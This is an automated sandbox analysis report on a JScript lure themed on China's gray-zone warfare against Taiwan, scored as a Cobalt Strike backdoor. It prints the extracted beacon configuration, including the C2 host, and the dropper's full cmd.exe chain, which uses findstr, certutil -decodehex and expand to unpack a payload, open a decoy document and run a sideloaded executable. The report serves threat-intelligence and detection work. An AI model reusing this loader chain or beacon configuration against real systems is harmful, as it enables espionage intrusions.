Overview

overview

10

Static

static

1

China's_gr...oc.lnk

windows7-x64

10

China's_gr...oc.lnk

windows10-2004-x64

10

China's_gr...cat.js

windows7-x64

10

China's_gr...cat.js

windows10-2004-x64

10

Analysis

  • max time kernel
    144s
  • max time network
    145s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
  • submitted
    12-01-2024 11:04

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    China's_gray-zone_warfare_against_Taiwan/__MACOS/_params.cat.js

  • Size

    1.4MB

  • MD5

    83be472a5402d0b32e40cc6d761a8a37

  • SHA1

    e44732160aae29881342dfde89db0fe9aa984f7f

  • SHA256

    434517ef2e12af66ef97b740e4caf9b07a73f1321bf013b6ee6dd0d180804409

  • SHA512

    0c490221d52f7460608cb85be047aa36337ca5c1e6b0de39b870ef41dab23a96eef36e05a400e1848c6136e9d34f4c3f1a72dd390c80798d9bb3148cf3271c0d

  • SSDEEP

    24576:lWGkPK8x3nD7v6hfaMk4HY7rlho/S28f2HCQbuNc0W1w/HiELEVZ7110Yy36ht6Y:/

Score
10/10
cobaltstrike100000000backdoortrojan

Malware Config

Extracted

Family

cobaltstrike

Botnet

100000000

C2

http://upserver.updateservice.store:443/common.html

Attributes
  • access_type

    512

  • beacon_type

    2048

  • host

    upserver.updateservice.store,/common.html

  • http_header1

    AAAAEAAAACJIb3N0OiB1cHNlcnZlci51cGRhdGVzZXJ2aWNlLnN0b3JlAAAACgAAABFDb25uZWN0aW9uOiBjbG9zZQAAAAcAAAAAAAAACwAAAAMAAAACAAAAA2x1PQAAAAYAAAAGQ29va2llAAAACQAAAAt2ZXJpZnk9dHJ1ZQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=

  • http_header2

    AAAAEAAAACJIb3N0OiB1cHNlcnZlci51cGRhdGVzZXJ2aWNlLnN0b3JlAAAACgAAABFDb25uZWN0aW9uOiBjbG9zZQAAAAoAAAAvQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQAAAAHAAAAAQAAAAMAAAADAAAAAgAAAAhhdXRob3JzPQAAAAQAAAAHAAAAAAAAAAMAAAACAAAADl9fc2Vzc2lvbl9faWQ9AAAABgAAAAZDb29raWUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=

  • http_method1

    GET

  • http_method2

    POST

  • jitter

    9472

  • polling_time

    58666

  • port_number

    443

  • sc_process32

    %windir%\syswow64\svchost.exe

  • sc_process64

    %windir%\sysnative\svchost.exe

  • state_machine

    MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCdQ5nVpJ13O9CwiQRtLOdTAwGg6oj4mvtVqZvCbSy9YyU3ngZSDBgmWjSMwrTqMvvKUr5RvigK1N00xTGT4LVtDESUaUvyGU79G24yPaF5rUOJjnAIRazosjB87DvXbI6k45HQsVyZD7wgEXnKFmv3E0Tk9ti5G0eVOKL5tqdS5QIDAQABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==

  • unknown1

    6.1158912e+08

  • unknown2

    AAAABAAAAAIAAAJYAAAAAwAAAAMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==

  • uri

    /r-arrow

  • user_agent

    Mozilla/5.0 (Windows Phone 10.0; Android 6.0.1; Microsoft; RM-1152) AppleWebKit/537.36 (KHTML, like Gecko)

  • watermark

    100000000

Signatures

  • Cobaltstrike

    Detected malicious payload which is part of Cobaltstrike.

    trojanbackdoorcobaltstrike
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
    adwarespyware
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 2 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\China's_gray-zone_warfare_against_Taiwan\__MACOS\_params.cat.js
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2024
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c findstr 4d534346 C:\Users\Admin\AppData\Roaming\lFbRwJ.tmp > C:\Users\Admin\AppData\Roaming\sxytyM.tmp&for /r c:\windows\system32\ %i in (*ertu*.exe) do %i -decodehex C:\Users\Admin\AppData\Roaming\sxytyM.tmp C:\Users\Admin\AppData\Roaming\SfnLzw.tmp&expand -F:* C:\Users\Admin\AppData\Roaming\SfnLzw.tmp C:\Users\Admin\AppData\Roaming\&start C:\Users\Admin\AppData\Roaming\China's_gray-zone_warfare_against_Taiwan.doc&start C:\Users\Admin\AppData\Roaming\360se.exe&del C:\Users\Admin\AppData\Roaming\lFbRwJ.tmp C:\Users\Admin\AppData\Roaming\sxytyM.tmp C:\Users\Admin\AppData\Roaming\SfnLzw.tmp
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2796
      • C:\Windows\system32\findstr.exe
        findstr 4d534346 C:\Users\Admin\AppData\Roaming\lFbRwJ.tmp
        3⤵
          PID:2156
        • \??\c:\windows\system32\certutil.exe
          c:\windows\system32\certutil.exe -decodehex C:\Users\Admin\AppData\Roaming\sxytyM.tmp C:\Users\Admin\AppData\Roaming\SfnLzw.tmp
          3⤵
            PID:2688
          • C:\Windows\system32\expand.exe
            expand -F:* C:\Users\Admin\AppData\Roaming\SfnLzw.tmp C:\Users\Admin\AppData\Roaming\
            3⤵
            • Drops file in Windows directory
            PID:2760
          • C:\Users\Admin\AppData\Roaming\360se.exe
            C:\Users\Admin\AppData\Roaming\360se.exe
            3⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious behavior: CmdExeWriteProcessMemorySpam
            PID:2756
          • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
            "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Roaming\China's_gray-zone_warfare_against_Taiwan.doc"
            3⤵
            • Drops file in Windows directory
            • Modifies Internet Explorer settings
            • Modifies registry class
            • Suspicious behavior: AddClipboardFormatListener
            • Suspicious behavior: CmdExeWriteProcessMemorySpam
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:2732
            • C:\Windows\splwow64.exe
              C:\Windows\splwow64.exe 12288
              4⤵
                PID:1648

        Network

        MITRE ATT&CK Matrix ATT&CK v13

        Initial Access

        Execution

        Persistence

        Privilege Escalation

        Defense Evasion

        Modify Registry

        1
        T1112

        Credential Access

        Discovery

        System Information Discovery

        1
        T1082

        Lateral Movement

        Collection

        Exfiltration

        Command and Control

        Impact

        Resource Development

        Reconnaissance

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
          Filesize

          20KB

          MD5

          dbcea5869bfc256f9220db9a7d04c4e9

          SHA1

          7d029086ccf3a44bfd3ac955cbaa1dae099d8014

          SHA256

          8be008a9a9257fe2248ac86ebb566b5ba3c7d85cfc8484f6209a69cb22369e1e

          SHA512

          639b4d43d92bc46c45d25816f571b916f0021ff8a82cc153d12098ac646e78b49d424eea0f8db2965e501e7663e1c9ac075d9916579eeabb3084f17ae3b1f82e

          Download Submit
        • C:\Users\Admin\AppData\Roaming\lFbRwJ.tmp
          Filesize

          768KB

          MD5

          3a5d8b6cd9ed9eaaf2a4eca6ececf614

          SHA1

          f2405f13c88ee9c734fa35f776427923c8cfc90e

          SHA256

          4702d44f416fea9a92e9f299f7ec30c56524ae3281dbb3c5abd723ec6cbc075d

          SHA512

          23fc2d78c4c1bbdad6194a8132f5dfe184db5a4a0a2b9b2ec5bd3193dc5414ac2db6a5156dfb80377477588c7797f1cdda25d29c20c017523a6387e3bccfa65d

          Download Submit
        • C:\Users\Admin\AppData\Roaming\sxytyM.tmp
          Filesize

          112KB

          MD5

          0c1585a525705f9f103c88726d13c210

          SHA1

          3ed0e06658dfd522fa49dccbf6b6decae435ff76

          SHA256

          751ae2969d8d26f75ac67ae577418140a6d2c0830134b53e87ef3b5367673abc

          SHA512

          392f6379e237aa420640fceeea18a78a78766fa03574cf2f6c6421a16149edb618431c9a85e0a09672911e2a3e27d3b02d84bb828fb70a5f3918497a848974c5

          Download Submit
        • \??\c:\users\admin\appdata\roaming\sfnlzw.tmp
          MD5

          d41d8cd98f00b204e9800998ecf8427e

          SHA1

          da39a3ee5e6b4b0d3255bfef95601890afd80709

          SHA256

          e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

          SHA512

          cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

          Download Submit
        • memory/2732-46-0x000000005FFF0000-0x0000000060000000-memory.dmp
          Filesize

          64KB

          Download
        • memory/2732-47-0x000000007144D000-0x0000000071458000-memory.dmp
          Filesize

          44KB

          Download
        • memory/2732-40-0x000000002F281000-0x000000002F282000-memory.dmp
          Filesize

          4KB

          Download
        • memory/2732-78-0x000000007144D000-0x0000000071458000-memory.dmp
          Filesize

          44KB

          Download
        • memory/2732-95-0x000000005FFF0000-0x0000000060000000-memory.dmp
          Filesize

          64KB

          Download
        • memory/2756-67-0x00000000002E0000-0x0000000000368000-memory.dmp
          Filesize

          544KB

          Download
        • memory/2756-66-0x00000000000F0000-0x0000000000124000-memory.dmp
          Filesize

          208KB

          Download
        • memory/2756-68-0x00000000002E0000-0x0000000000368000-memory.dmp
          Filesize

          544KB

          Download